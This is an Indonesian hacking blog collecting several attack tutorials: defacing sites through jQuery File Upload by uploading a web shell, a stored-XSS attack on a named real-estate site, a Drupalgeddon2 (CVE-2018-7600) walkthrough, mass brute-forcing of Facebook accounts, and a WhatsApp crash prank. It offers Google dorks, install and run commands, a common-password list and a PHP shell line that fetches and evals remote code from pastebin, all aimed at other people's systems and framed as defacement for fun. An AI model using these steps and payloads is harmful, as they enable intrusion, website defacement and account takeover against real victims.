Deface metode Jquery File Upload

Deface metode Jquery File Upload

Baiklah kembali lagi dengan saya Adewa
Pada tutorial kali ini saya sendiri akan menshare "Deface metode Jquery File Upload"

langsung aja kita mulai

Dork
index/server/php "Jquery" site:

Exploit
server/php

Csrf Online [Touch Me]
http://bali.co.nz/csrf.php

1. Dorking dulu di google, jika menemukan web tambahkan server/php

2. Jika menemukan seperti ini berarti sitenya vuln jquery


3. Langsung saja buka CSRF onlinenya

4. Masukkan targetnya beserta exploit seperti ini site.co.li/server/php pada bagian post isi aja files[]


5. Kunci target kalian dan upload shellnya


5. Akses shell tambahkan files pada website
Contoh
site.co.li/server/php/files/nama shel.php


Selamat anda telah berhasil merusak website seseorang, Sekian dan terimakasih

Register TO XSS ATTACK EXPLOIT

Register TO XSS ATTACK EXPLOIT

Hallo semuanya kembali lagi dengan saya Adewa
Maaf akhir akhir ini saya jarang post di All Tutor Cyber
Karena lagi sibuk sama urusan di tempat lain

Kali ini saya sendiri akan memberikan Exploit yg saya dapatkan dari menikung, hehe

langsung saja simak exploitnnya di bawah ini

[+] Exploit Title : Register TO XSS ATTACK 
[+]
[+] Dork : "/index.php/frontend/login/en"
[+]
[+]==================================================================
[+]
[+] Author : Mr.Adewa
[+] Team : Hunter Security Crew
[+] Tested on : WINDOWS 7
[+]
[+] Contact : fb.com/adewa.go.id
[+]==================================================================
[+]
[+] Register : http://www.keeleyrealestate.com/index.php/frontend/login/en
[+] Register dat
[+] Create an XSS script on JS
[+] Link script :https://pastebin.com/raw/CM4ZXXB5
[+] Link encript (Encript HTML SCRIPT) http://jdstiles.com/java/cct.html
[+]
[+] View Conteck
[+] IM TESTING http://stayinbudva.com/property/356/en?preview=true
[+]==================================================================



Baiklah itulah Exploit yg ingin saya postkan
Jika masih kurang jelas atau kurang paham, bisa kunjungi video youtube saya di bawah ini


Sekian dan terimakasih
Salam ALL TUTOR CYBER

Deface Drupal RCE


Tag :
- Deface Drupal RCE
- Drupalgeddon2
- Exploit drupalgeddon2
- Instal drupalgeddon2
- Instal drupalgeddon2 in Termux


Sedikit cerita mengenai Drupalgeddon2 :
Exsploitasi Drupalgeddon2 Dimulai setelah proof-of-concept Dipublikasi. Kode yang dihosting di GitHub, dibuat oleh Vitalii Rudnykh, seorang peneliti keamanan Rusia. Kode ini didasarkan pada rincian kerentanan Drupalgeddon2 yang diterbitkan oleh Check Point dan Dofinity.
Kerentanan ( CVE-2018-7600 ) memungkinkan penyerang untuk menjalankan kode apa pun yang diinginkannya terhadap salah satu komponen inti CMS, yang secara efektif mengambil alih sebuah situs.

Langsung saja ke Tutorialnya :

Bahan persiapan :
1. Linux / Termux ( yang ingin menjalankan di os windows harus mengistal ruby terlebih dahulu )
2. Shell :
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php
     Password shellnya : alltutorcyber
3. Dork :  "alltutorcyber" inurl:/?q=node/ "powered by drupal"
    ( Kembangi lagi dorknya, "alltutorcyber" bisa diganti dengan kata kata yang publik )

Cara Menginstal drupalgeddon2 :
> pkg install git
> gem install ruby
> git clone https://github.com/dreadlocked/Drupalgeddon2
Cara Menjalankannya :
> cd Drupalgeddon2
> ruby drupalgeddon2.rb http://sitetarget.co.li/

 1. Pertama tama dorking dulu "casino" inurl:/?q=node/ "powered by drupal" ke google pencarian


2. Pilih salah satu web target
3. Untuk mencheck versi Drupalnya tambahkan /CHANGELOG.txt pada link web target.

exploit drupalgeddon2 hanya bisa pada versi 7.x.x . Jika menemukan versi 6 / 8 tinggalin aja

4. Masukkan ke exploitnya lalu jalankan



5. Jika muncul "Fake Shell" masukkan perintah uname -a


6. Nahh.. Jika muncul nama servernya berarti vuln untuk upload shell. Masukkan perintah echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php



7. Jika sudah begini berarti kita sudah sukses mengupload shellnya. tinggal buka web target dan tambahin nama shell yang kalian upload tadi /namashell.php


Mudah bukan? :v
Itu adalah target yang saya coba menggunakan exploit drupalgeddon2. Password shellnya adalah "alltutorcyber"


Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Drupal RCE" Semoga Bisa Bermanfaat!



Anda Sekarang Sedang Membaca Postingan "Deface Drupal RCE" Dengan URL https://www.alltutorcyber.me/2018/05/deface-drupalgeddon2-rce.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

Multi Bruteforce Facebook


Multi Bruteforce Facebook in Termux

Apa itu Brute Force?
Brute Force Attack adalah metode untuk meretas password ( password cracking ) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Metode ini keberhasilnya tergantung list password yang dimasukkan kedalam wordlist. Namun, proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu. Lamanya waktu akan ditentukan oleh panjang dan kombinasi karakter password yang akan diretas.

Nah.. Sekarang Multi Bruteforce Facebook itu apa?
Menurut saya, Multi Bruteforce Facebook ini adalah metode yang digunakan untuk mencari user facebook yang sesuai dengan password yang kita dimasukkan. Jadi kita menggunakan satu password untuk mengkombinasi ke siapa password itu sesuai dengan pengguna facebook. banyaknya list username pengguna Facebook bisa didapatkan dari Teman Facebook, Anggota Grup Facebook, dan list ID dari File yang kita masukkan.

Multi Bruteforce Facebook fiture :

  • Auto grab ID facebook from grup
  • Auto grab ID facebook from friendlist
  • Mass Bruteforce facebook account
  • Bruteforce with single password
  • Bruteforce with wordlist


Langsung saja ke Tutorialnya :

Bahan yang harus ada :
  1. Termux ( bisa didownload di Playstore )
  2. Internet
Cara Menginstalnya :

$ apt update && apt upgrade
$ pkg install python2 git
$ pip2 install mechanize
$ git clone https://github.com/pirmansx/mbf


Cara Menjalankannya :

$ ls
$ cd mbf
$ python2 MBF.py


Nahh.. Jika sudah seperti gambar diatas, kalian tinggal memilih ambil IDnya dari mana.
Jika kalian memilih "1" dari teman Facebook kalian, kalian harus login dulu untuk mendapatkan ID teman fb kalian. Jika kalian memilih "2" dari Anggota Grup, kalian tinggal memasukkan ID grup facebook.

Dan selanjutnya kalian tinggal memasukkan password untuk mencari ke username facebook siapa yang sesuai. Tunggu proses bruteforcenya berjalan.


Mudah bukan?
Dibawah ini saya akan memberikan beberapa password yang paling sering saya dapatkan digunakan orang : 

- sayang
- cintaku
- iloveyou
- doraemon
- forever
- imissyou
- thn,bln, dan tgl lahir
- marga,suku atau julukan

Sekianlah Postingan Dari All Tutor Cyber tentang "Multi Bruteforce Facebook" dan Terimakasih kepada pembuat tools ini "Pirmansx" ( Author MBF )  Semoga Bisa Bermanfaat!


Anda Sekarang Sedang Membaca Postingan "Multi Bruteforce Facebook" Dengan URL https://ryangueltoem.blogspot.com/2018/05/multi-bruteforce-facebook.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

Cara Membuat Whatsapp Crash Error [ TERBARU ]

WhatsApp adalah aplikasi pesan untuk smartphone dengan basic mirip BlackBerry Messenger. WhatsApp Messenger merupakan aplikasi pesan lintas platform yang memungkinkan kita bertukar pesan tanpa biaya SMS, karena WhatsApp Messenger menggunakan paket data internet yang sama untuk email, browsing web, dan lain-lain. Aplikasi WhatsApp Messenger menggunakan koneksi 3G atau WiFi untuk komunikasi data. Dengan menggunakan WhatsApp, kita dapat melakukan obrolan online, berbagi file, bertukar foto dan lain-lain.

Tapi dibalik keseruan bermain Whatsapp anda bisa mejahili temen anda melalui status Whatsapp anda yang jika di klik akan membuat Smartphone os android teman anda crash error.
Mungkin anda pernah juga menggunakan code 4.0.4.0 untuk membuat Whatsapp crash. Namun cara ini berbeda.


Apakah kalian pernah mendapatkan status pada whatsapp seperti gambar diatas dan jika diklik maka whatsapp anda lag dan kembali ke menu android?
Error tersebut bukan disebabkan oleh emoji lingkaran hitam tersebut, tapi karakter yang tak terlihat setelah lingkaran hitam sampai teks t-touch-here. Bukan cuma whatsapp aja yang akan crash tetapi aplikasi yang support teks format juga akan tidak merespon (ANR) .

Code membuat Whatsapp Error :

Nah.. itu adalah code membuat whatsapp atau aplikasi support teks format lainnya seperti aplikasi catatan di android menjadi error. Code hanya membuat crash pada Smartphone OS Android saja.


Sekianlah Postingan Dari All Tutor Cyber tentang "Cara Membuat Whatsapp Crash Error [ TERBARU ]" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Cara Membuat Whatsapp Crash Error [ TERBARU ]" Dengan URL https://ryangueltoem.blogspot.com/2018/05/cara-membuat-whatsapp-crash-error.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.


Banner 88x31

Join,Like,Follow Us

Label

Site Info

Banner & Link Teman

Music

Diberdayakan oleh Blogger.

Cari Blog Ini

Partners